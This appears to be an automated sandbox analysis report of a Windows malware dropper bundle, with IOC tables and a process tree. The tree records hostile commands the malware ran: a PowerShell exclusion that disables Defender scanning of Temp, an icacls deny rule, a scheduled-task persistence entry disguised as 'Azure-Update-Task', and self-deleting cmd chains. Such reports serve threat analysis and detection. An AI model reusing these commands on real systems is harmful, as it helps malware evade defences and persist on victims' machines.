7076	efcvtew

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4368	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	4368	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	4368	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	4368	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	4368	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	4368	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	4368	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	4368	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	4368	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	4368	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	4368	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	4368	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	4368	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	4368	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	4368	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	4368	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	4368	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	4368	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	4368	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	4368	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	4368	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	4368	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	4368	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	4368	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	4368	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	4368	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	4368	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	4368	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	4368	Sun19262b9e49ad.exe
Token: 31	4368	Sun19262b9e49ad.exe
Token: 32	4368	Sun19262b9e49ad.exe
Token: 33	4368	Sun19262b9e49ad.exe
Token: 34	4368	Sun19262b9e49ad.exe
Token: 35	4368	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	4536	Sun191101c1aaa.exe
Token: SeDebugPrivilege	4428	Sun19e4ade31b2a.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	4704	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	4564	Sun198361825f4.exe
Token: SeDebugPrivilege	4200	3293587.scr
Token: SeDebugPrivilege	4932	2.exe
Token: SeDebugPrivilege	4900	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeRestorePrivilege	3772	WerFault.exe
Token: SeBackupPrivilege	3772	WerFault.exe
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeShutdownPrivilege	2252	Explorer.EXE
Token: SeCreatePagefilePrivilege	2252	Explorer.EXE
Token: SeDebugPrivilege	4848	5.exe
Token: SeDebugPrivilege	3792	rundll32.exe
Token: SeDebugPrivilege	3792	rundll32.exe
Token: SeDebugPrivilege	2608	svchost.exe
Token: SeDebugPrivilege	2536	3529892.scr
Token: SeDebugPrivilege	3792	rundll32.exe
Token: SeDebugPrivilege	3772	WerFault.exe
Token: SeDebugPrivilege	3792	rundll32.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
6052	5517.exe
1408	ultramediaburner.tmp
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
5696	installer.exe
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE
2252	Explorer.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2252	Explorer.EXE
6164	MicrosoftEdge.exe
6096	Process not Found
6096	Process not Found
7804	MicrosoftEdge.exe
6892	MicrosoftEdgeCP.exe
6892	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 3168	2868	setup_x86_x64_install.exe	73
PID 2868 wrote to memory of 3168	2868	setup_x86_x64_install.exe	73
PID 2868 wrote to memory of 3168	2868	setup_x86_x64_install.exe	73
PID 3168 wrote to memory of 3684	3168	setup_installer.exe	74
PID 3168 wrote to memory of 3684	3168	setup_installer.exe	74
PID 3168 wrote to memory of 3684	3168	setup_installer.exe	74
PID 3684 wrote to memory of 4020	3684	setup_install.exe	77
PID 3684 wrote to memory of 4020	3684	setup_install.exe	77
PID 3684 wrote to memory of 4020	3684	setup_install.exe	77
PID 3684 wrote to memory of 2284	3684	setup_install.exe	189
PID 3684 wrote to memory of 2284	3684	setup_install.exe	189
PID 3684 wrote to memory of 2284	3684	setup_install.exe	189
PID 3684 wrote to memory of 2868	3684	setup_install.exe	78
PID 3684 wrote to memory of 2868	3684	setup_install.exe	78
PID 3684 wrote to memory of 2868	3684	setup_install.exe	78
PID 3684 wrote to memory of 4112	3684	setup_install.exe	150
PID 3684 wrote to memory of 4112	3684	setup_install.exe	150
PID 3684 wrote to memory of 4112	3684	setup_install.exe	150
PID 3684 wrote to memory of 4136	3684	setup_install.exe	149
PID 3684 wrote to memory of 4136	3684	setup_install.exe	149
PID 3684 wrote to memory of 4136	3684	setup_install.exe	149
PID 3684 wrote to memory of 4156	3684	setup_install.exe	148
PID 3684 wrote to memory of 4156	3684	setup_install.exe	148
PID 3684 wrote to memory of 4156	3684	setup_install.exe	148
PID 2284 wrote to memory of 4172	2284	WerFault.exe	147
PID 2284 wrote to memory of 4172	2284	WerFault.exe	147
PID 2284 wrote to memory of 4172	2284	WerFault.exe	147
PID 3684 wrote to memory of 4192	3684	setup_install.exe	146
PID 3684 wrote to memory of 4192	3684	setup_install.exe	146
PID 3684 wrote to memory of 4192	3684	setup_install.exe	146
PID 3684 wrote to memory of 4224	3684	setup_install.exe	145
PID 3684 wrote to memory of 4224	3684	setup_install.exe	145
PID 3684 wrote to memory of 4224	3684	setup_install.exe	145
PID 3684 wrote to memory of 4252	3684	setup_install.exe	79
PID 3684 wrote to memory of 4252	3684	setup_install.exe	79
PID 3684 wrote to memory of 4252	3684	setup_install.exe	79
PID 3684 wrote to memory of 4268	3684	setup_install.exe	100
PID 3684 wrote to memory of 4268	3684	setup_install.exe	100
PID 3684 wrote to memory of 4268	3684	setup_install.exe	100
PID 4020 wrote to memory of 4312	4020	cmd.exe	98
PID 4020 wrote to memory of 4312	4020	cmd.exe	98
PID 4020 wrote to memory of 4312	4020	cmd.exe	98
PID 3684 wrote to memory of 4296	3684	setup_install.exe	97
PID 3684 wrote to memory of 4296	3684	setup_install.exe	97
PID 3684 wrote to memory of 4296	3684	setup_install.exe	97
PID 4112 wrote to memory of 4304	4112	cmd.exe	99
PID 4112 wrote to memory of 4304	4112	cmd.exe	99
PID 3684 wrote to memory of 4336	3684	setup_install.exe	80
PID 3684 wrote to memory of 4336	3684	setup_install.exe	80
PID 3684 wrote to memory of 4336	3684	setup_install.exe	80
PID 4156 wrote to memory of 4360	4156	cmd.exe	92
PID 4156 wrote to memory of 4360	4156	cmd.exe	92
PID 4156 wrote to memory of 4360	4156	cmd.exe	92
PID 3684 wrote to memory of 4384	3684	setup_install.exe	90
PID 3684 wrote to memory of 4384	3684	setup_install.exe	90
PID 3684 wrote to memory of 4384	3684	setup_install.exe	90
PID 2868 wrote to memory of 4368	2868	cmd.exe	91
PID 2868 wrote to memory of 4368	2868	cmd.exe	91
PID 2868 wrote to memory of 4368	2868	cmd.exe	91
PID 4136 wrote to memory of 4428	4136	cmd.exe	81
PID 4136 wrote to memory of 4428	4136	cmd.exe	81
PID 4192 wrote to memory of 4508	4192	cmd.exe	89
PID 4192 wrote to memory of 4508	4192	cmd.exe	89
PID 4192 wrote to memory of 4508	4192	cmd.exe	89

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2252
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3168
  - - C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4020
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:816
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
        5⤵
        
        PID:4252
      - C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19eb40faaaa9.exe
        
        Sun19eb40faaaa9.exe
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:4516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
        5⤵
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun195a1614ec24e6a.exe
        
        Sun195a1614ec24e6a.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
        5⤵
        
        PID:4384
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
        5⤵
        
        PID:4268
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4192
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4136
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4112
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
        5⤵
        
        PID:2284
- C:\Users\Admin\AppData\Local\Temp\282A.exe
  C:\Users\Admin\AppData\Local\Temp\282A.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Users\Admin\AppData\Local\Temp\5517.exe
  C:\Users\Admin\AppData\Local\Temp\5517.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1324
- - C:\Users\Admin\AppData\Local\Temp\5517.exe
    C:\Users\Admin\AppData\Local\Temp\5517.exe
    3⤵
    - Adds Run key to start application
    PID:4816
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\37ee7f47-34cf-4fdf-a9ca-b9589a36b813" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\5517.exe
      "C:\Users\Admin\AppData\Local\Temp\5517.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Suspicious use of FindShellTrayWindow
      PID:6052
    - - C:\Users\Admin\AppData\Local\Temp\5517.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5517.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:7264
      - C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe
        
        "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe
        
        "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe"
        7⤵
        Loads dropped DLL
        Checks processor information in registry
        
        PID:7872
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        9⤵
        Kills process with taskkill
        
        PID:8140
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:8128
      - C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe
        
        "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe
        
        "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe"
        7⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:7256
- C:\Users\Admin\AppData\Local\Temp\734F.exe
  C:\Users\Admin\AppData\Local\Temp\734F.exe
  2⤵
  PID:6872
- C:\Users\Admin\AppData\Local\Temp\9658.exe
  C:\Users\Admin\AppData\Local\Temp\9658.exe
  2⤵
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5680
- C:\Users\Admin\AppData\Local\Temp\E6AC.exe
  C:\Users\Admin\AppData\Local\Temp\E6AC.exe
  2⤵
  PID:7888
- C:\Users\Admin\AppData\Local\Temp\F850.exe
  C:\Users\Admin\AppData\Local\Temp\F850.exe
  2⤵
  - Loads dropped DLL
  PID:64
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F850.exe"
    3⤵
    PID:6444
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:6992

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2708
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:7200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5188

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1072

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:696
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4368
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:7892
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      Blocklisted process makes network request
      Executes dropped EXE
      Creates scheduled task(s)
      PID:6976
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4080
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5744
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4796
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4968
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5308
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:6428
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3196
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4540
- C:\Users\Admin\AppData\Roaming\efcvtew
  C:\Users\Admin\AppData\Roaming\efcvtew
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7076
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5388
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19e4ade31b2a.exe
Sun19e4ade31b2a.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4428
- C:\Users\Admin\AppData\Roaming\3293587.scr
  "C:\Users\Admin\AppData\Roaming\3293587.scr" /S
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4200
- C:\Users\Admin\AppData\Roaming\3529892.scr
  "C:\Users\Admin\AppData\Roaming\3529892.scr" /S
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- - C:\Users\Admin\AppData\Roaming\3529892.scr
    "C:\Users\Admin\AppData\Roaming\3529892.scr"
    3⤵
    - Executes dropped EXE
    PID:5248
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 924
    3⤵
    - Program crash
    PID:5552
- C:\Users\Admin\AppData\Roaming\3861655.scr
  "C:\Users\Admin\AppData\Roaming\3861655.scr" /S
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2476
- C:\Users\Admin\AppData\Roaming\7587421.scr
  "C:\Users\Admin\AppData\Roaming\7587421.scr" /S
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5172

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1966fb31dd5a07.exe
Sun1966fb31dd5a07.exe
1⤵
- Executes dropped EXE
PID:4760
- C:\Users\Admin\AppData\Local\Temp\is-N3QMT.tmp\Sun1966fb31dd5a07.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-N3QMT.tmp\Sun1966fb31dd5a07.tmp" /SL5="$20192,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1966fb31dd5a07.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4964
- - C:\Users\Admin\AppData\Local\Temp\is-RB78P.tmp\Ze2ro.exe
    "C:\Users\Admin\AppData\Local\Temp\is-RB78P.tmp\Ze2ro.exe" /S /UID=burnerch2
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    PID:4572
  - - C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe
      "C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      PID:4672
    - - C:\Users\Admin\AppData\Local\Temp\is-0PUT2.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0PUT2.tmp\ultramediaburner.tmp" /SL5="$20324,281924,62464,C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:1408
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2876
  - - C:\Users\Admin\AppData\Local\Temp\71-3a7d4-5b4-6d4b5-c35ec495c0f9b\Qinaeloxela.exe
      "C:\Users\Admin\AppData\Local\Temp\71-3a7d4-5b4-6d4b5-c35ec495c0f9b\Qinaeloxela.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\5b-1f0d7-7b7-b3f96-a2732025cc83a\Jyhatyshyba.exe
      "C:\Users\Admin\AppData\Local\Temp\5b-1f0d7-7b7-b3f96-a2732025cc83a\Jyhatyshyba.exe"
      4⤵
      Executes dropped EXE
      PID:5444
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe /eufive & exit
        5⤵
        
        PID:6896
      - C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe /eufive
        6⤵
        Executes dropped EXE
        
        PID:5916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        
        PID:6996
      - C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:5696
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632114046 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:3300
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe & exit
        5⤵
        
        PID:7152
      - C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe
        6⤵
        Executes dropped EXE
        
        PID:6344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe /mixfive & exit
        5⤵
        
        PID:6516
      - C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe /mixfive
        6⤵
        
        PID:6976

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1905815e51282417.exe
Sun1905815e51282417.exe
1⤵
- Executes dropped EXE
PID:4644

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun198361825f4.exe
Sun198361825f4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564
- C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2752
- - C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
    C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
    3⤵
    - Executes dropped EXE
    PID:5804

C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun191101c1aaa.exe
Sun191101c1aaa.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4536
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  - Executes dropped EXE
  PID:2808
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    - Executes dropped EXE
    PID:1152
  - - C:\Windows\System32\cmd.exe
